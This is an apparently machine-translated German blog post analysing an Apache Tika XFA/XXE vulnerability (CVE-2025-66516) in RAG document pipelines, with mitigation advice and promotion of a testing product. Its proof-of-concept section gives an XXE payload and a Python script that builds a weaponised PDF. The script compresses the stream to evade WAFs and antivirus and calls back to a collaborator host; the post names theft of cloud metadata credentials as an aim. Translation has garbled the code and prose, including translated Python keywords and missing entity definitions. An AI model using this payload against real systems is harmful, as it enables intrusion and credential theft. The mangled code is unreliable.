Anatomie eines RAG-Killers: Vertiefung in CVE-2025-66516 und die Apache Tika RCE

Bei der überstürzten Einführung von RAG-Pipelines (Retrieval-Augmented Generation) hat die Branche kollektiv eine grundlegende Wahrheit ignoriert: Der Parser ist die Angriffsfläche.

Während sich die Schlagzeilen im Jahr 2025 auf Prompt Injection und Jailbreaking konzentrierten, zielen die verheerendsten Angriffe auf die unscheinbare Middleware, die die Daten verarbeitet. CVE-2025-66516 (CVSS 10.0) ist die Krönung dieses Versehens. Es handelt sich nicht um eine KI-Schwachstelle per seEs handelt sich um eine Schwachstelle der alten Infrastruktur, die als Waffe gegen moderne KI-Architekturen eingesetzt wird.

Diese Analyse schlüsselt die Mechanismen der Apache Tika XFA-Schwachstelle auf, zeigt, warum Standard-WAFs diese Schwachstelle nicht erkennen, und bietet eine verifizierte Proof of Concept (PoC)-Strategie für Penetrationstester.

Der Kontext: Warum CVE-2025-66516 jetzt wichtig ist

Um den Schweregrad zu verstehen, müssen wir die Architektur eines typischen Unternehmens-RAG-Systems im Jahr 2026 analysieren.

1. Benutzerebene: Ein Mitarbeiter lädt eine PDF-Datei (z. B. einen Finanzbericht oder einen Lebenslauf) auf einen internen "KI-Assistenten" hoch.
2. Verschluckbare Schicht: Das Backend (LangChain, LlamaIndex oder benutzerdefinierte Python-Skripte) verwendet einen Dokumentenlader.
3. Parsing-Schicht: 85% dieser Lader basieren auf Apache Tika (die oft als Headless Server in einem Docker-Container läuft), um Text zu extrahieren.
4. Vektorisierung: Der Text wird eingebettet und in einer Vektordatenbank (Pinecone, Milvus, Weaviate) gespeichert.

CVE-2025-66516 Treffer Schicht 3. Es ermöglicht einem Angreifer, eine bösartige XML Forms Architecture (XFA)-Nutzlast in ein Standard-PDF einzubetten. Wenn Tika versucht, die Formulardaten zu parsen, um Text für die LLM zu extrahieren, wird die XML-Datei ausgeführt, was zu Externe XML-Entität (XXE) Injektion.

Da Tika Server oft mit Root-Rechten in Containern läuft, um temporäre Dateien zu verwalten, eskaliert dieses XXE sofort zu Entfernte Code-Ausführung (RCE) oder Server-seitige Anforderungsfälschung (SSRF)Dadurch können Angreifer AWS-Metadaten-Anmeldeinformationen auslesen oder in die interne VPC eindringen.

Technische Aufschlüsselung: Der Logikfehler im XFA-Parser

Die Schwachstelle besteht in der org.apache.tika.parser.pdf.PDFParser Klasse, insbesondere in der Art und Weise, wie sie mit der XDP (XML-Datenpaket) in einer PDF-Datei.

In Versionen vor 3.2.2 sah die Logik zum Extrahieren von XFA-Daten etwa so aus (vereinfachte Java-Darstellung):

Java

// VULNERABLE CODE SEGMENT (Conceptual) if (document.getCatalog().getAcroForm().hasXFA()) { XFA xfa = document.getCatalog().getAcroForm().getXFA(); Document xfaDom = xfa.getDomDocument(); // <--- Trigger Point // Der Standard-XML-Transformer hier hat DTDs // oder externe Entitäten nicht effektiv für XFA-Streams deaktiviert. this.extractTextFromXFA(xfaDom); }

Der kritische Fehler war die Annahme, dass die PDF-Rendering-Engine (PDFBox) den XML-Stream bereinigt, bevor Tika auf das DOM zugreift. Das war nicht der Fall. Der Parser vertraute implizit auf die interne Struktur der PDF-Datei.

Vergleich: Standard XXE vs. CVE-2025-66516

Konstruktion des Exploits (PoC)

Um dies zu erreichen, reicht ein einfacher Texteditor nicht aus. Wir müssen die PDF-Objektstruktur manipulieren. Das Ziel ist die Einschleusung eines bösartigen XDP Stream, der auf eine externe Entität unter Ihrer Kontrolle verweist.

Phase 1: Die bösartige XML-Nutzlast

Zunächst erstellen wir das XML, das die Entität definiert. Wir wollen auf Out-of-Band-Interaktion (OOB) testen, um die Schwachstelle zu bestätigen, ohne den Server abstürzen zu lassen.

XML

<xdp:xdp xmlns:xdp=""> <!DOCTYPE data [ <!ENTITY % payload SYSTEM ""> %payload; ]> CVE-Check

Phase 2: Python-Injektionsskript

Wir verwenden Python, um dieses XML in eine gültige PDF-Objektstruktur zu verpacken. Auf diese Weise wird ein signaturbasiertes Antivirenprogramm umgangen, da die Datei eine mathematisch gültige PDF-Datei ist.

Python

zlib importieren

def build_exploit_pdf(callback_url): # 1. Definieren Sie das bösartige XFA-Paket xfa_xml = f""" <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <!DOCTYPE root [ %xxe; ]> """.strip()

# 2. Komprimieren des Datenstroms (Obfuscation)
# Tika wird dies automatisch aufblasen, aber WAFs vermissen oft komprimierte Streams
stream_content = zlib.compress(xfa_xml.encode('utf-8'))

# 3. Konstruieren Sie den PDF-Body
#-Objekt 3 referenziert den XFA-Stream
pdf_body = (
    b "%PDF-1.7\\n"
    b "1 0 obj\\n<< /Typ /Katalog /Seiten 2 0 R /AcroForm <> >>\\nendobj\n"
    b "2 0 obj\\n<>\\nendobj\\n"
    b "3 0 obj\\n<>\\n"
    b "stream\\n" + stream_content + b"\\nendstream\\nendobj\n"
    b "trailer\\n<>\\n%%EOF"
)

with open("lebenslauf_hacker.pdf", "wb") as f:
    f.write(pdf_body)
print(f"[+] Artefakt 'lebenslauf_hacker.pdf' erstellt mit zlib-Kompression.")

Ausführen

build_exploit_pdf("http://burp-collaborator-url/xxe_trigger“)`

Wenn der RAG-Agent des Opfers die lebenslauf_hacker.pdf um Einbettungen zu generieren, bläst das Tika-Backend das Objekt 3 auf, analysiert das XML und sendet eine Anfrage an die URL Ihres Kooperationspartners.

Der blinde Fleck in modernen DevSecOps

Warum ist CVE-2025-66516 auch im Jahr 2026 noch vorhanden? Dies zeigt eine erhebliche Lücke in der "Shift Left"-Methodik.

Die meisten DevSecOps-Teams scannen ihre Quellcode (SAST) und ihre Basisbilder (Container-Scanning). Allerdings wird Tika oft als "Blackbox"-Dienstprogramm behandelt.

• SAST sieht es nicht, weil es eine binäre Abhängigkeit ist.
• DAST (Dynamic Application Security Testing) prüft in der Regel die API-Endpunkte mit JSON oder SQLi, versucht aber nur selten komplexe, binärformatige polyglotte Datei-Uploads.

Dies ist der Punkt, an dem herkömmliche Testmethoden bei KI-Agenten versagen. Der Agent ist darauf ausgelegt, komplexe unstrukturierte Daten zu verarbeiten; daher müssen auch die Testfälle komplexe unstrukturierte Daten sein.

Automatisierte Validierung mit Penligent

Dieser spezifische Vektor - eingebettete Angriffe in unstrukturierten Dateiformaten - ist ein Kernpunkt der offensiven Sicherheit der nächsten Generation. Dies ist der Punkt, an dem Tools wie Sträflich heben sich von traditionellen Scannern wie Nessus oder Burp Suite ab.

Die KI-Agenten von Penligent sind darauf ausgelegt, den Kontext der Anwendung zu verstehen. Wenn Penligent auf einen Datei-Upload-Endpunkt in einer RAG-Pipeline stößt, werden nicht nur die HTTP-Header gefuzzt. Es konstruiert auf intelligente Weise "mutationsbasierte" Nutzdaten wie den oben beschriebenen PDF-Exploit. Es fragt effektiv nach: "Wenn ich diese KI mit einem Lebenslauf füttere, der einen Exploit auf Kernel-Ebene enthält, wird sie ihn verarbeiten?"

Durch die Automatisierung der Erstellung dieser polyglotten Dateien (PDFs mit XXE, Bilder mit PHP-Webshells) simuliert Penligent einen ausgeklügelten Angreifer, der die zugrunde liegende Parsing-Logik des Ziels versteht, was eine realistische Einschätzung der Widerstandsfähigkeit der RAG-Pipeline gegen CVE-2025-66516 und ähnliche "Formatverwechslungs"-Angriffe ermöglicht.

Strategien zur Schadensbegrenzung

Wenn Ihr Unternehmen auf Tika (oder Frameworks, die es bündeln, wie Unstrukturiert.io oder LangChain Community), wenden Sie diese Korrekturen sofort an.

1. Die "nukleare" Option: XFA deaktivieren

Wenn Ihr Unternehmen nicht ausdrücklich das Parsen von Daten aus interaktiven PDF-Formularen benötigt (was bei RAG selten der Fall ist), deaktivieren Sie den XFA-Parser vollständig in tika-konfig.xml.

XML

false false false

2. Isolieren des Parsers (Das "Schleusen"-Muster)

Führen Sie das Parsen von Dokumenten niemals im gleichen Kontext wie Ihre Anwendungslogik oder Vektordatenbank aus.

• Führen Sie Tika in einem distroless Container aus.
• Netzwerk-Isolierung: Der Tika-Container sollte Folgendes enthalten Zugang ohne Ausstieg. Er empfängt eine Datei, gibt Text zurück und kann keine Verbindungen zum Internet oder dem internen Cloud-Metadatendienst (169.254.169.254).
• Begrenzte Ressourcen: Setzen Sie strenge Speichergrenzen (Xmx), um "Billion Laughs"-DoS-Angriffe zu verhindern, die oft Cousins von XXE sind.

3. Wechsel zu Sandboxed Parsern

Erwägen Sie die Abkehr von Java-basierten Parsern für nicht vertrauenswürdige Eingaben. Moderne Alternativen, die Rust oder Go verwenden, oder Sandbox-Umgebungen wie gVisor oder AWS-Knallfroschbieten eine viel stärkere Isolationsebene für die von Natur aus riskante Aufgabe des Parsens von Binärdateien.

Zusammenfassung

CVE-2025-66516 ist ein Weckruf für die KI-Sicherheit. Wir bauen intelligente Schlösser auf Sand. Solange unsere KI-Modelle auf jahrzehntealte Parsing-Bibliotheken angewiesen sind, um die Welt zu interpretieren, werden diese Bibliotheken der Weg des geringsten Widerstands für Angreifer bleiben.

Sichern Sie Ihre Ingestion-Schicht. Überprüfen Sie Ihre Tika-Versionen. Und gehen Sie davon aus, dass jedes PDF, das in Ihr System hochgeladen wird, eine Waffe ist, bis das Gegenteil bewiesen ist.

Referenzen und weiterführende Literatur

• Apache Tika Sicherheitsbulletins (offiziell)
• OWASP Top 10 für LLM-Anwendungen: LLM06 Excessive Agency
• NVD - CVE-2025-66516 Einzelheiten
• BlackHat 2025 Vortrag: "Parsing the Unparsable"